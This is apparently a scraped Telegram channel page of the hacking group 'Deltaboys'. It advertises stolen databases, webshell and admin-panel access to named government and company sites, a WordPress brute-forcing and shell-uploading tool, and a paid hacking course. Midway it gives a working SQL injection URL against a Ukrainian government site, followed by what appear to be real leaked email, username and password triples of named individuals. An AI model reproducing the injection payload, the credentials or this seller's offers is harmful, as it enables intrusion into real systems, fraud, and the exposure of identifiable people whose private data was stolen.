Leaked Database
384 subscribers
714 photos
31 videos
350 files
827 links
Priv8 Database For Sell
More Databases Are Personally Hacked
And Is Private / Just For Sell IN BTC/USDT

We Are Old Hackers

Contact : deltaboys@protonmail.com

Backup Channel :
https://t.me/+8tRKTAobgOU3NTI0

ID : @anony989

#DB #database #leak
Download Telegram
Media is too big
VIEW IN TELEGRAM
Sensitive File Disclosure Vulnerability


Human error causes serious risks in websites

In this tutorial, we will teach you how to check a type of human error

Firewalls, secure servers, and great programmers are of no use when there is human error.

It is a sensitive file that we want to review

The config file is the site

Considering that the target is on the Windows platform and server

config file name is === web.config

2love.co.il Hacking Video

Sample from Deltaboys Traning Pack (https://t.me/leak_db/1458)

Add TO VIP
Add To Channel (only for today)
Access Add To VIP

Ucan Join in Vip By 150$

If u Buy Traning Pack We Add free To VIP
http://poland.gov.krd/ Webshell Access

Price: 1100$ 1300$

prof : https://poland.gov.krd/wp/krg/delta.txt

Contact: deltaboys@protonmail.com
Paf.gov.pk Full Database

Database:500$
Adminpanel Access 700$

PM TO Buy : @anony989
http://www.inpsy.naps.gov.ua/Conference.php?h_id=-19%27+union+select+1,2,group_concat(Login,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users--%20-

ADMIN LOGIN

http://www.inpsy.naps.gov.ua/Login.php

email:Login:password

iitzn.napn@gmail.com:admin:iitzn.napn@gmail.com

djoksana@yandex.ru:birma:80663620030j

manuylovaolga@gmail.com:olga:19899891

mailalexslv@gmail.com:Alexslv:educonf

Oleg_Spirin@ukr.net:som:sony

anna13.00.10@gmail.com:anna13.00.10:0663111952


https://t.me/leak_db/1458

Join Us
@anony989
https://investglo.com/ Webshell And Database Access

Price: 1500$

Hot Access To make Money 👍

InvestGlo is the trading name of Caps Solutions
Ltd, a company
incorporated under the laws of Labuan, bearing company registration number LL16622,
regulated by the
Labuan Financial Services Authority (LFSA), license number MB/20/0052 with registered
address Unit B Lot
49 1st Floor Block F Lazenda Warehouse 3 Jalan Ranca-Ranca 87000 FT Labuan, Malaysia.
This website is
operated by Caps Solutions Ltd and Caps Solutions UK Ltd, a company bearing registration
number 12734767
and having its registered address at Almack House 26-28 King Street, London, England
SW1Y 6QW. Payments
are processed by Caps Solutions UK Ltd on behalf of Caps Solutions Ltd.

PM TO Buy : @anony989
Spain 300K+500K Users Data (800K) 800,385 Rows
🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸
Fresh And New Data

Email,user,pass,city,phone......

auth_id user_id fax url email phone gender suffix country locales auth_str disabled initials password username last_name first_name salutation inline_help middle_name date_validated billing_address date_last_email date_last_login date_registered disabled_reason mailing_address must_change_password

Format: CSV,SQL

Price: 600$

PM TO Buy : @anony989
Contact: deltaboys@protonmail.com
800K_Spain_Sample.csv
5.6 KB
Sample Of 800K Users Data Spain
http://caa.gov.qa/

DB Access
Sub Admin Panel Access
Outlook Emails Access
Users Database user,password,name,email
1 Vpn Account Access From Priv8 Network
+Connected To qatar Airways Amadeus

Price: 900$

Only 1 Sell (After Payment Post Will Be Changed By Sold

PM TO Buy : @anony989
SQL INJECTION /Blind/Bypass/TimeBase/ErrorBase/Standard
Cookie/UserAgent Sql Injection
LOCAL FILE INCLUDE
REMOTE FILE INCLUDE
Local File Download
Directory Traversal
Cross Site Request Forgery (CSRF)
Remote File Upload / File Upload / Abrity File Upload / Shell Uploading
Sensitive Information Disclosure
Weak Password Attack
Brute Force Attack /AdminPanels/Emails/PMA/Outlook ....
Back Up And Database Attacks
Session Fixture Disclosure
Session Disclosure
Session Fixation
Google Hacking / Find Target
Server Hacking
Server Symlink
Server Rooting
Connect Back From Access
Get The SSH Access From Target
Use Exploit For Vulnerabilities
Human Errors / Security Misconfiguration / LTY
Database Remote Connecting
Database Bypass
Get Backup From DataBase / Remote/Local
Use Webshell , Tools , BruteForcers
Backdoor Usage / Weevely Usage
Goverment Targets 0-100 Video To Access
And More ....

200$
+VIP ACCESS
Sample video Uploaded On channel

https://t.me/leak_db/1457

https://t.me/leak_db/1448

PM TO Buy : @anony989
American People Full Info Database
Full Data and Information

American_Samoa
Arizona
California
Colorado
Delaware
Florida
Florida 2
Georgia
Guam
Washington_DC
2021 Florida Voters
missing-people
head_n100_gov
Fbi.gov
BIG DATA Companies
.....

10 GB DATA
price: 300 $
https://hesperia.gsfc.nasa.gov/ Webshell Access

Price:1000$

Nasa Subdomain WebShell Access

contact: deltaboys@protonmail.com
Media is too big
VIEW IN TELEGRAM
Wordpress Mass Bruteforcer By List of Website
Wordpress Auto Shell Uploader
+ Traning Video

Price:70$

By Using this tool you can attack a list of websites
to give you access if the password is recognized
You can also get shells from the list of detected sites automatically

It is enough to add the list of sites and after a little patience, many websites will be accessed

Video+tools === 70$

contact: deltaboys@protonmail.com
agwine Database
1746 Usa Users email+password+detail
100$

contact: deltaboys@protonmail.com

@leak_db
Spain 300K+500K Users Data (800K) 800,385 Rows
🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸🇪🇸
Fresh And New Data

Email,user,pass,city,phone......

auth_id user_id fax url email phone gender suffix country locales auth_str disabled initials password username last_name first_name salutation inline_help middle_name date_validated billing_address date_last_email date_last_login date_registered disabled_reason mailing_address must_change_password

Format: CSV,SQL

Price: 600$

PM TO Buy : @anony989
Contact: deltaboys@protonmail.com
800K_Spain_Sample.csv
5.6 KB
Sample Of 800K Users Data Spain
Forwarded from Leaked Database
SQL INJECTION /Blind/Bypass/TimeBase/ErrorBase/Standard
Cookie/UserAgent Sql Injection
LOCAL FILE INCLUDE
REMOTE FILE INCLUDE
Local File Download
Directory Traversal
Cross Site Request Forgery (CSRF)
Remote File Upload / File Upload / Abrity File Upload / Shell Uploading
Sensitive Information Disclosure
Weak Password Attack
Brute Force Attack /AdminPanels/Emails/PMA/Outlook ....
Back Up And Database Attacks
Session Fixture Disclosure
Session Disclosure
Session Fixation
Google Hacking / Find Target
Server Hacking
Server Symlink
Server Rooting
Connect Back From Access
Get The SSH Access From Target
Use Exploit For Vulnerabilities
Human Errors / Security Misconfiguration / LTY
Database Remote Connecting
Database Bypass
Get Backup From DataBase / Remote/Local
Use Webshell , Tools , BruteForcers
Backdoor Usage / Weevely Usage
Goverment Targets 0-100 Video To Access
And More ....

200$
+VIP ACCESS
Sample video Uploaded On channel

https://t.me/leak_db/1457

https://t.me/leak_db/1448

PM TO Buy : @anony989